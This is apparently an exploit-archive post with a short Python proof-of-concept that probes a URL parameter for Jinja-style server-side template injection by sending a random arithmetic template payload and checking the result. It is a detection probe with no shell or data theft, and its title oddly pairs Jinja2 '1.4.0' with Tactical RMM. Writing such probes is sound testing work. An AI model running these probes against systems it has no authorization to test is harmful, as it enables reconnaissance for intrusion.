=============================================================================================================================================
| # Title     : Jinja 2 1.4.0 Tactical RMM SSTI Detection                                                                                    |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : https://pypi.org/project/Jinja2/                                                                                            |
=============================================================================================================================================

[+] Summary    : This proof-of-concept script detects potential Server-Side Template Injection (SSTI) vulnerabilities in web applications using template engines such as Jinja.
                 The script sends a dynamically generated mathematical expression within a template payload to a target URL parameter. 
				 If the server evaluates the expression and returns the calculated result, this indicates that user-controlled input is being processed by the template engine without proper sanitization or sandboxing.
                 Such behavior confirms the presence of an SSTI vulnerability, which may allow attackers to access internal application objects and potentially escalate the issue to more severe impacts if additional weaknesses exist.
                 The script improves detection reliability by generating randomized arithmetic expressions, reducing the likelihood of false positives during testing.
			  
[+] POC   :  

import requests
import random
import sys

def detect_ssti(url, param="tpl"):
    a = random.randint(10, 99)
    b = random.randint(10, 99)
    expected = str(a * b)

    payload = "{{%d*%d}}" % (a, b)

    try:
        r = requests.get(url, params={param: payload}, timeout=10)

        if expected in r.text:
            print("[+] SSTI detected!")
            print("[+] Payload:", payload)
            print("[+] Expected:", expected)
            return True
        else:
            print("[-] No SSTI detected")

    except Exception as e:
        print("[-] Error:", e)

    return False


if __name__ == "__main__":

    if len(sys.argv) != 2:
        print("Usage: python ssti_poc.py http://target/?tpl=")
        sys.exit(1)

    target = sys.argv[1]
    detect_ssti(target)

	
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================